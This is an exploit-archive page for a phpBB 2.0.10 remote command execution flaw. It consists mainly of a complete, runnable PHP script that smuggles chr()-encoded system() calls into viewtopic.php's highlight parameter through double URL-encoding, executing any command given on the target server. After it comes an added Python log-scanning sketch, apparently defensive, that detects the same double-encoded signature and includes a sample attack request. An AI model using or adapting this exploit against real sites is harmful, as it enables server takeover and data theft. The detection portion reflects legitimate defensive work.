phpBB highlight parameter Processing Remote Execution Exploit
Source: www.scan-associates.net  Author: pokleyzz  Published: 2004-11-21

-> Official fix Here


#!/usr/bin/php -q
<?php
/*
# phpBB 2.0.10 execute command by pokleyzz <pokleyzz at scan-associates.net>
# 15th November 2004 : 4:04 a.m
#
# bug found by How Dark (www howdark com) (1st October 2004)
#
# Requirement:
#
# PHP 4.x with curl extension;
#
# ** Selamat Hari Raya **
*/

if (!(function_exists('curl_init'))) {
    echo "cURL extension required\n";
    exit;
}

if ($argv[2]){
    $url = $argv[1];
    $command = $argv[2];
}
else {
    echo "Usage: ".$argv[0]." <URL> <command> [topic id] [proxy]\n\n";
    echo "\tURL\t URL to phpnBB site (ex: http://127.0.0.1/html)\n";
    echo "\tcommand\t command to execute on server (ex: 'ls -la')\n";
    echo "\ttopic_id\t topic id\n";
    echo "\tproxy\t optional proxy url (ex: http://10.10.10.10:8080)\n";
    exit;
}
if ($argv[3])
    $topic = $argv[3];
else
    $topic = 1;

if ($argv[4])
    $proxy = $argv[4];


$cmd = str2chr($command);

$action = "/viewtopic.php?t=$topic&highlight=%2527%252esystem(".$cmd." )%252e%2527";
$ch=curl_init();
if ($proxy){
    curl_setopt($ch, CURLOPT_PROXY,$proxy);
}
curl_setopt($ch, CURLOPT_URL,$url.$action);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
$res=curl_exec ($ch);
curl_close ($ch);
echo $res;

function str2chr($str){

    for($i = 0;$i < strlen($str);$i++){
        $chr .= "chr(".ord($str{$i}).")";
        if ($i != strlen($str) -1)
            $chr .= "%252e";
    }
    return $chr;
}
?>
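
Added example (not part of the original post or of phpBB): the request built above carries a double URL-encoded quote (%2527) and dot (%252e) in the highlight parameter of viewtopic.php, which gives a defender a clear signature to look for in web server access logs. The Python sketch below flags highlight values that are still percent-encoded after one decode or that decode to quote or call syntax. The log format, the character list and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate highlight term never needs these characters.
CODE_CHARS = re.compile(r"['\"`();$\\]")

def decode_layers(value, max_rounds=5):
    """Percent-decode until the value stops changing; return (value, rounds)."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds

def check_line(line):
    """Return a finding dict for a suspicious viewtopic.php request, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    target = urlsplit(m.group(1))
    if not target.path.endswith("/viewtopic.php"):
        return None
    for once in parse_qs(target.query, keep_blank_values=True).get("highlight", []):
        # parse_qs removed the first encoding layer, as the web server does.
        final, extra = decode_layers(once)
        reasons = []
        if extra:
            reasons.append("still percent-encoded after one decode")
        if CODE_CHARS.search(final):
            reasons.append("quote or call syntax in decoded value")
        if reasons:
            return {"decoded": final, "extra_layers": extra, "reasons": reasons}
    return None

# Constructed sample log lines (not taken from any real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [21/Nov/2004:10:00:01 +0000] "GET /viewtopic.php?t=1&highlight=install+guide HTTP/1.1" 200 5120',
    '192.0.2.10 - - [21/Nov/2004:10:00:05 +0000] "GET /viewtopic.php?t=7&highlight=caf%C3%A9 HTTP/1.1" 200 4211',
    '198.51.100.7 - - [21/Nov/2004:10:02:13 +0000] "GET /html/viewtopic.php?t=1&highlight=%2527%252esystem(chr(120))%252e%2527 HTTP/1.0" 200 9034',
]

def scan(lines):
    return [(i, f) for i, line in enumerate(lines, 1) if (f := check_line(line))]

if __name__ == "__main__":
    for lineno, finding in scan(SAMPLE_LOG):
        print(lineno, finding)
```

A hit on the double-encoding check alone is worth reviewing, since ordinary browsers encode a search term only once.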